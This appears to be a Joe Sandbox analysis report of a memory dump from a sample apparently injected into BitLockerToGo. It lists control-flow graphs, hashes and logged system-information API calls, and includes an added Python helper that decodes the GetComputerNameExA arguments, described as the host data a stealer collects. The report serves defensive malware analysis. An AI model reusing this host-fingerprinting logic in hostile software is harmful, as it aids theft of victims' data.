                                                                                                                                                                                                            control_flow_graph 644 42be8a-42bea6 645 42beb0-42bf05 644->645 645->645 646 42bf07-42bf0e 645->646 647 42c284 646->647 648 42bf14-42bf1b 646->648 650 42c287-42c2a5 647->650 649 42bf20-42bf29 648->649 649->649 651 42bf2b 649->651 653 42c2b0-42c2dd 650->653 651->650 653->653 654 42c2df-42c2e6 653->654 655 42c2fb-42c307 654->655 656 42c2e8-42c2ef 654->656 658 42c321-42c348 call 43f450 655->658 659 42c309-42c30b 655->659 657 42c2f0-42c2f9 656->657 657->655 657->657 663 42c34d-42c38f GetPhysicallyInstalledSystemMemory 658->663 660 42c310-42c31d 659->660 660->660 662 42c31f 660->662 662->658 664 42c390-42c3e9 663->664 664->664 665 42c3eb-42c429 call 41dc90 664->665 668 42c430-42c471 665->668 668->668 669 42c473-42c47a 668->669 670 42c47c-42c483 669->670 671 42c49d 669->671 673 42c490-42c499 670->673 672 42c4a0-42c4aa 671->672 675 42c4ac-42c4af 672->675 676 42c4bd 672->676 673->673 674 42c49b 673->674 674->672 678 42c4b0-42c4b9 675->678 677 42c4bf-42c4ce 676->677 680 42c4d0-42c4d7 677->680 681 42c4eb-42c53a 677->681 678->678 679 42c4bb 678->679 679->677 682 42c4e0-42c4e9 680->682 683 42c540-42c55e 681->683 682->681 682->682 683->683 684 42c560-42c567 683->684 685 42c57b-42c588 684->685 686 42c569-42c56f 684->686 688 42c58a-42c591 685->688 689 42c5ab-42c661 685->689 687 42c570-42c579 686->687 687->685 687->687 690 42c5a0-42c5a9 688->690 691 42c662 689->691 690->689 690->690 691->691
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                                                                                                                            • Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 696 42c26c-42c2a5 call 4327d0 call 407ee0 702 42c2b0-42c2dd 696->702 702->702 703 42c2df-42c2e6 702->703 704 42c2fb-42c307 703->704 705 42c2e8-42c2ef 703->705 707 42c321-42c348 call 43f450 704->707 708 42c309-42c30b 704->708 706 42c2f0-42c2f9 705->706 706->704 706->706 712 42c34d-42c38f GetPhysicallyInstalledSystemMemory 707->712 709 42c310-42c31d 708->709 709->709 711 42c31f 709->711 711->707 713 42c390-42c3e9 712->713 713->713 714 42c3eb-42c429 call 41dc90 713->714 717 42c430-42c471 714->717 717->717 718 42c473-42c47a 717->718 719 42c47c-42c483 718->719 720 42c49d 718->720 722 42c490-42c499 719->722 721 42c4a0-42c4aa 720->721 724 42c4ac-42c4af 721->724 725 42c4bd 721->725 722->722 723 42c49b 722->723 723->721 727 42c4b0-42c4b9 724->727 726 42c4bf-42c4ce 725->726 729 42c4d0-42c4d7 726->729 730 42c4eb-42c53a 726->730 727->727 728 42c4bb 727->728 728->726 731 42c4e0-42c4e9 729->731 732 42c540-42c55e 730->732 731->730 731->731 732->732 733 42c560-42c567 732->733 734 42c57b-42c588 733->734 735 42c569-42c56f 733->735 737 42c58a-42c591 734->737 738 42c5ab-42c661 734->738 736 42c570-42c579 735->736 736->734 736->736 739 42c5a0-42c5a9 737->739 740 42c662 738->740 739->738 739->739 740->740
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                                                                                                                            • Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            control_flow_graph 741 42c282-42c2a5 743 42c2b0-42c2dd 741->743 743->743 744 42c2df-42c2e6 743->744 745 42c2fb-42c307 744->745 746 42c2e8-42c2ef 744->746 748 42c321-42c38f call 43f450 GetPhysicallyInstalledSystemMemory 745->748 749 42c309-42c30b 745->749 747 42c2f0-42c2f9 746->747 747->745 747->747 754 42c390-42c3e9 748->754 750 42c310-42c31d 749->750 750->750 752 42c31f 750->752 752->748 754->754 755 42c3eb-42c429 call 41dc90 754->755 758 42c430-42c471 755->758 758->758 759 42c473-42c47a 758->759 760 42c47c-42c483 759->760 761 42c49d 759->761 763 42c490-42c499 760->763 762 42c4a0-42c4aa 761->762 765 42c4ac-42c4af 762->765 766 42c4bd 762->766 763->763 764 42c49b 763->764 764->762 768 42c4b0-42c4b9 765->768 767 42c4bf-42c4ce 766->767 770 42c4d0-42c4d7 767->770 771 42c4eb-42c53a 767->771 768->768 769 42c4bb 768->769 769->767 772 42c4e0-42c4e9 770->772 773 42c540-42c55e 771->773 772->771 772->772 773->773 774 42c560-42c567 773->774 775 42c57b-42c588 774->775 776 42c569-42c56f 774->776 778 42c58a-42c591 775->778 779 42c5ab-42c661 775->779 777 42c570-42c579 776->777 777->775 777->777 780 42c5a0-42c5a9 778->780 781 42c662 779->781 780->779 780->780 781->781
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                            • String ID: BVAI
                                                                                                                                                                                                            • API String ID: 3960555810-2651495128
                                                                                                                                                                                                            • Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                                                                                                                            • Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: =:;8$
                                                                                                                                                                                                            • API String ID: 2994545307-3594289699
                                                                                                                                                                                                            • Opcode ID: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                                                                                                                            • Instruction ID: c423fdc3fd0ad810bcad91faa20af3043e37e718d9259fa2435a4e627f55f2db
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFA1657AB083104BE724DF64D88066BB7E2EBD5314F19853DDAC297341DA38EC25CB96
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID: Zysf${ts|
                                                                                                                                                                                                            • API String ID: 2994545307-929106683
                                                                                                                                                                                                            • Opcode ID: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                                                                                                                            • Instruction ID: d8bc85cb00ae77c9a618740bd9c139a142b3571fb9705fb1d300c60273d40d62
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F817EB1B083219BD714DF25EC81B3B73A6DBC5314F59843EE58697392E63CAC04839A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 8A6CA42990BFD5D420A4C476FD51BCB1$]b
                                                                                                                                                                                                            • API String ID: 0-633589551
                                                                                                                                                                                                            • Opcode ID: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
• Instruction ID: 53dbd2ff0650d5a4b6327cdb9e65b9ca1bffd35d2773582bc8f85aad4ecb8dd8
• Opcode Fuzzy Hash: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
• Instruction Fuzzy Hash: A1617977E043904BD320CB26CC517AFBAD2ABD5315F19C93DD8C9E7285DB3849058782
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: uJ[L$yJ[L
• API String ID: 0-3296124075
• Opcode ID: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
• Instruction ID: 974635f0455fef9b14944d53f12c23bc89291c5e3f93e9d67168785d5e3144d2
• Opcode Fuzzy Hash: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
• Instruction Fuzzy Hash: EC31E5B2A405019FDB19CF68CC627AE7BE2EB59310F29417DD252E7790DB3999018718
APIs
• LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: yPC
• API String ID: 2994545307-621879255
• Opcode ID: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
• Instruction ID: e001d4929498538a0a8ecbb7f051c84920bd96f0897afdf19a85230a06394eb9
• Opcode Fuzzy Hash: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
• Instruction Fuzzy Hash: 86617836A082145BE7249E28DC5177BB3A3EBC9710F1E943EDAC597345E6399C0187C5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: D]+\
• API String ID: 0-1174097187
• Opcode ID: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
• Instruction ID: 8b969df8764a6140270626732b9a31d532f0956a4ad419ee8c7d181fdb0ffe63
• Opcode Fuzzy Hash: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
• Instruction Fuzzy Hash: A1314878B482008BE7188F42E99073B73A6E7CE300F29753ED481172C6C2389C129B9E
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
• Instruction ID: 87dcadc3cc869a97b24ddec11b738d0474b7b08a840880998656ded9c4dd36b4
• Opcode Fuzzy Hash: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
• Instruction Fuzzy Hash: F9A1053250C3848FE3049B28895536BFBD29BDA318F29992EF0D557382DABDC545D70B
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
• Instruction ID: 4f8d52657f7084f69bf055083d43b99a2f5dee74b0ad81f64ba48cb646f5989a
• Opcode Fuzzy Hash: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
• Instruction Fuzzy Hash: 467148B69043108BD724DF24DC917EB73A2EF85324F09493EE885873A1D73DA841D79A
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
• Instruction ID: 6d45d2c3cd36f3333d69d70c7c241f502430d0bdfbc6ce3510ca67b0fea4cfba
• Opcode Fuzzy Hash: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
• Instruction Fuzzy Hash: 2D614875A583015BDB148F18C851B2BB3A2EFDD310F19A43EE986873A5DB34DC15C74A
Control-flow Graph (rendered interactively in the report; basic blocks recovered from its node list): 42b842-42b84c; 42b84e-42b855; 42b860-42b869; 42b86b-42b8b6 (call 43f450); 42b8c0-42b8e5; 42b8e7-42b8f1; 42b8f3-42b8fa; 42b900-42b909; 42b90b-42b942 (GetComputerNameExA); 42b946
APIs
• FreeLibrary.KERNEL32(?), ref: 0042B875
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: KHGN$v
• API String ID: 2904949787-192462181
• Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
• Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
• Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
• Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56
Control-flow Graph (rendered interactively in the report; basic blocks recovered from its node list): 42b840-42b8b6 (call 43f450); 42b8c0-42b8e5; 42b8e7-42b8f1; 42b8f3-42b8fa; 42b900-42b909; 42b90b-42b942 (GetComputerNameExA); 42b946
APIs
• FreeLibrary.KERNEL32(?), ref: 0042B875
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
Strings
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: KHGN$v
• API String ID: 2904949787-192462181
• Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
• Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
• Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
• Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92
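The API entries above log GetComputerNameExA with its first argument as a raw hex value (00000006 at 0042B924, and 00000005 at 0042BA54 elsewhere in this listing). That argument is the COMPUTER_NAME_FORMAT enum from winbase.h, so decoding it tells the analyst which host name the sample is collecting. The following is an added example, not Joe Sandbox tooling and not the sample's code: a small parser for the "Func.MODULE(args), ref: ADDR" lines of this report that maps the format constant to its enum name. The sample lines are copied from the report's API entries; the enum values are from the Windows SDK header.

```python
"""Decode GetComputerNameExA calls from Joe Sandbox API listing lines.

Added example for this report, not part of Joe Sandbox or of the sample.
"""
import re
from typing import Optional

# COMPUTER_NAME_FORMAT from winbase.h (Windows SDK).
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS",
    1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain",
    3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS",
    5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain",
    7: "ComputerNamePhysicalDnsFullyQualified",
}

# Shape of a Joe Sandbox "APIs" line:  "• Func.MODULE(arg,arg,...), ref: ADDR"
_API_LINE = re.compile(
    r"^\s*\u2022?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_line(line: str) -> Optional[dict]:
    """Return {func, module, args, ref} for one API line, or None if it is not one.

    Arguments the sandbox could not resolve are logged as "?" and become None.
    """
    m = _API_LINE.match(line)
    if not m:
        return None
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        if raw == "":
            continue  # empty argument list: "()"
        args.append(None if raw == "?" else int(raw, 16))
    return {
        "func": m.group("func"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def describe(call: dict) -> str:
    """Human-readable one-liner; decodes the format argument of GetComputerNameExA."""
    if call["func"] == "GetComputerNameExA" and len(call["args"]) >= 3:
        fmt, _buf, size = call["args"][:3]
        name = COMPUTER_NAME_FORMAT.get(fmt, f"unknown({fmt})")
        size_txt = f"{size:#x}" if size is not None else "?"
        return f"{call['ref']:08X}: GetComputerNameExA({name}, bufsize={size_txt})"
    return f"{call['ref']:08X}: {call['func']}"


def triage(lines) -> list:
    """Parse every API line in `lines`, skipping anything that is not one."""
    return [describe(c) for c in (parse_api_line(l) for l in lines) if c]


# Lines copied from the report's API entries for the BitLockerToGo memory dump.
SAMPLE_LINES = [
    "• FreeLibrary.KERNEL32(?), ref: 0042B875",
    "• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924",
    "• GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54",
    "Strings",  # non-API line, ignored by the parser
]

if __name__ == "__main__":
    for entry in triage(SAMPLE_LINES):
        print(entry)
```

Running it shows that the two calls ask for ComputerNamePhysicalDnsDomain and ComputerNamePhysicalDnsHostname into a 0x100-byte buffer, which is the host identity an operator would expect a stealer to report; the "physical" variants bypass any cluster or alias name, so the value is the machine's own DNS name.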
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: bC
                                                                                                                                                                                                            • API String ID: 3545744682-4190571504
                                                                                                                                                                                                            • Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                                                                                                                            • Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: bC
                                                                                                                                                                                                            • API String ID: 3545744682-4190571504
                                                                                                                                                                                                            • Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                                                                                                                            • Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                                                            • String ID: KHGN
                                                                                                                                                                                                            • API String ID: 3545744682-1032087821
                                                                                                                                                                                                            • Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                                                                                                                            • Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                            • Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                                                                                                                            • Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
                                                                                                                                                                                                            • Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 00436831
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DefaultLanguageUser
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 95929093-0
                                                                                                                                                                                                            • Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                                                                                                                            • Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BlanketProxy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3890896728-0
                                                                                                                                                                                                            • Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                                                                                                                            • Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2
